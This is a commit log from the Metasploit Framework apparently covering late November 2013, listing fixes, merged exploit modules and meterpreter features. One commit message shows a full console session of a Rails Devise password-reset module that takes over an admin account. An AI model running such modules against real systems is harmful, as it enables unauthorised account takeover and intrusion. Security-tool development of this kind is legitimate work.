Jeff Jarmoc
03838aaa79
Update rails_devise_pass_reset.rb
...
Fixed erroneous status if FLUSHTOKENS is false.
2013-11-27 22:27:45 -06:00
OJ
0c59c885c4
Fix metsrv.dll name issue
...
As mentioned here https://community.rapid7.com/thread/3788 the metsvc
script was still looking for the old file name for metsrv.dll, which
was causing the script to fail.
This commit fixes this issue. A hash is used to indicate local and remote
file names so that the remote can continue to use metsrv.dll, but it
is correctly located on disk locally.
2013-11-28 11:48:11 +10:00
sinn3r
a8af050c16
Update post module Apache Tomcat description
...
This module's description needs to be more descriptive, otherwise
you kind of have to pull the source code to see what it actually
does for you.
2013-11-27 19:21:27 -06:00
sinn3r
a02e0ee3e4
Land #2682 - Kimai v0.9.2 'db_restore.php' SQL Injection
2013-11-27 19:10:44 -06:00
Jeff Jarmoc
7f8baf979d
Adds the ability to configure object name in URI and XML. This allows exploiting other platforms that include devise.
...
For example, activeadmin is exploitable if running a vulnerable devise and rails version with the following settings:
msf > use auxiliary/admin/http/rails_devise_pass_reset
msf auxiliary(rails_devise_pass_reset) > set RHOST 127.0.0.1
RHOST => 127.0.0.1
msf auxiliary(rails_devise_pass_reset) > set RPORT 3000
RPORT => 3000
msf auxiliary(rails_devise_pass_reset) > set TARGETEMAIL admin@example.com
TARGETEMAIL => admin@example.com
msf auxiliary(rails_devise_pass_reset) > set TARGETURI /admin/password
TARGETURI => /admin/password
msf auxiliary(rails_devise_pass_reset) > set PASSWORD msf_pwnd
PASSWORD => msf_pwnd
msf auxiliary(rails_devise_pass_reset) > set OBJECTNAME admin_user
OBJECTNAME => admin_user
msf auxiliary(rails_devise_pass_reset) > exploit
[*] Clearing existing tokens...
[*] Generating reset token for admin@example.com...
[+] Reset token generated successfully
[*] Resetting password to "msf_pwnd"...
[+] Password reset worked successfully
[*] Auxiliary module execution completed
msf auxiliary(rails_devise_pass_reset) >
2013-11-27 15:35:43 -06:00
Peter Toth
95a98529c4
Removed script launcher wrapper and fixed the file_exists so that the module now detects input
2013-11-27 21:38:20 +01:00
William Vu
77b036ce5d
Land #2703, uninit const fix for MSSQL_SQLI
2013-11-27 13:50:48 -06:00
William Vu
05dfc161e4
Land #2702, uninit const fix for HttpClient
2013-11-27 13:47:13 -06:00
jvazquez-r7
a5aca618e2
fix fail_with usage on Exploit::Remote::MSSQL_SQLI
2013-11-27 11:33:19 -06:00
jvazquez-r7
a32c9e5efc
Fix fail_with on Exploit::Remote::HttpClient
2013-11-27 11:19:46 -06:00
Peter Toth
347d438f90
Merge pull request #1 from jvennix-r7/review_osx_mount_pr
...
Tweaks & fixes to osx mount PR
2013-11-27 09:12:00 -08:00
jvazquez-r7
6c8df4be27
Land #2699, @wvu fix for Linux download_exec post module
2013-11-27 10:22:35 -06:00
jvazquez-r7
0343aef7c8
Land #2695, @wchen-r7's support to detect silverlight
2013-11-27 09:40:12 -06:00
joev
6561f149a8
DRY up URL_REGEX constant.
2013-11-27 06:16:25 -06:00
joev
b0416b802d
Change the Recent shares implementation.
...
* Allows us to see protocol of Recent Shares
* Parses protocol from file share URL
2013-11-27 06:08:48 -06:00
joev
e876155e1a
More tweaks to mount_share.
...
* Adds some docs to some of the methods to further distinguish
the separate sets of shares.
2013-11-27 05:45:46 -06:00
joev
485e38ebca
Some code tweaks to post/osx/mount_share.
...
* Make PROTOCOL an Enum
* Move path override options to advanced section
* More Enumerable rework
* Move one-off regexes back to inline, pull out protocol list
2013-11-27 05:22:12 -06:00
William Vu
f3e71c2c9d
Be more specific
...
Perl!
2013-11-27 01:03:41 -06:00
William Vu
b202b98a42
Anchor the scheme
2013-11-27 00:57:45 -06:00
William Vu
e8da97aa17
Fix extraneous use of which and cmdsub
...
I don't even.
2013-11-27 00:43:07 -06:00
William Vu
288476441f
Fix improper use of expand_path
...
I don't even.
2013-11-27 00:42:09 -06:00
OJ
468654d2b5
Add RDI submodule, port Kitrap0d
...
This commit is the first in a series that will move all the exploits that use RDI
over to the R7 fork. The RDI source will be in a single known location and each
exploit will have to work from that location.
The kitrap0d exploit has been migrated over to use this submodule so that there's
one example of how it's done for future contributions to follow.
2013-11-27 16:04:41 +10:00
James Lee
25b1ec5b75
Land #2689, getenv
2013-11-26 23:33:25 -06:00
OJ
72813c1f3e
Merge branch 'egypt/feature/getenv-php' into getenv_cmd
2013-11-27 15:22:15 +10:00
James Lee
a3337e5de5
Add PHP side for meterpreter getenv
2013-11-26 23:16:28 -06:00
OJ
a0f703ee44
Add getenv support to python meterpreter
...
This change adds support for `getenv` to python meterpreter. Nothing too
complex going on here. I tidied up the definitions of the TLVs as well
so that they look nice.
2013-11-27 11:19:26 +10:00
William Vu
ee201a82cd
Land #2673, -x and -s for uploadexec meterp script
2013-11-26 16:26:38 -06:00
OJ
5fc9706268
Use Rex.sleep instead of sleep
2013-11-27 07:51:11 +10:00
sinn3r
5d10b44430
Add support for Silverlight
...
Add support for Silverlight exploitation. [SeeRM #8705]
2013-11-26 14:47:27 -06:00
William Vu
be86a29048
Land #2694, indentation fixes for Gemfile
2013-11-26 13:47:00 -06:00
sinn3r
a914fbc400
Land #2693 - case sensitive
2013-11-26 11:16:57 -06:00
Tod Beardsley
671c0d9473
Fix nokogiri typo
...
[SeeRM #8730]
2013-11-26 10:54:31 -06:00
James Lee
a2743e4493
Land #2692, fix title for ms13_022
2013-11-26 10:51:00 -06:00
Tab Assassin
c7d4cd9be2
Fix indentation on Gemfile
2013-11-26 10:48:50 -06:00
jvazquez-r7
253719d70c
Fix title
2013-11-26 08:11:29 -06:00
sinn3r
f1c5ab95bf
Land #2690 - typo
2013-11-25 23:53:34 -06:00
William Vu
70139d05ea
Fix missed title
2013-11-25 22:46:35 -06:00
jvazquez-r7
6cb63cdad6
Land #2679, @wchen-r7's exploit for cve-2013-3906
2013-11-25 22:04:26 -06:00
jvazquez-r7
0079413e81
Full revert the change
2013-11-25 22:04:02 -06:00
sinn3r
fa97c9fa7c
Revert this change
2013-11-25 20:54:39 -06:00
sinn3r
3247106626
Heap spray adjustment by @jvazquez-r7
2013-11-25 20:50:53 -06:00
jvazquez-r7
4c249bb6e9
Fix heap spray
2013-11-25 20:06:42 -06:00
OJ
1a65566005
Add the getenv command which pulls env vars from the victim
...
This command will allow the attacker to grab environment variables from the
target, if they exist. Calling this function allows for one or more values
to be passed in, which should match the name of the variable required. If
the variable is found, it is returned. If it is not found, the variable
is not returned (ie. it's not present in the resulting hash).
Note 1: POSIX environment vars are case-sensitive, whereas Windows is not.
Note 2: POSIX doesn't seem to cough up user environment vars, it only returns
system vars. I'm not sure why this is, but it could be because of the way
we do linking on POSIX.
2013-11-26 10:05:50 +10:00
sinn3r
385381cde2
Change target address
...
This one tends to work better with our boxes
2013-11-25 17:21:39 -06:00
jvazquez-r7
a7e6a79b15
Land #2685, @wchen-r7's update for the word injector description
2013-11-25 15:47:57 -06:00
William Vu
c7c97c9543
Land #2688, TaskManager spec timeout increase
2013-11-25 15:42:43 -06:00
jvazquez-r7
92807d0399
Land #2676, @todb-r7 module for CVE-2013-4164
2013-11-25 15:40:33 -06:00
sinn3r
57f4f68559
Land #2652 - Apache Roller OGNL Injection
2013-11-25 15:14:35 -06:00
sinn3r
8005826160
Land #2644 - MS13-090 CardSpaceClaimCollection vuln
2013-11-25 13:06:09 -06:00
sinn3r
4773270ff0
Land #2677 - MS12-022 COALineDashStyleArray vuln
2013-11-25 12:58:45 -06:00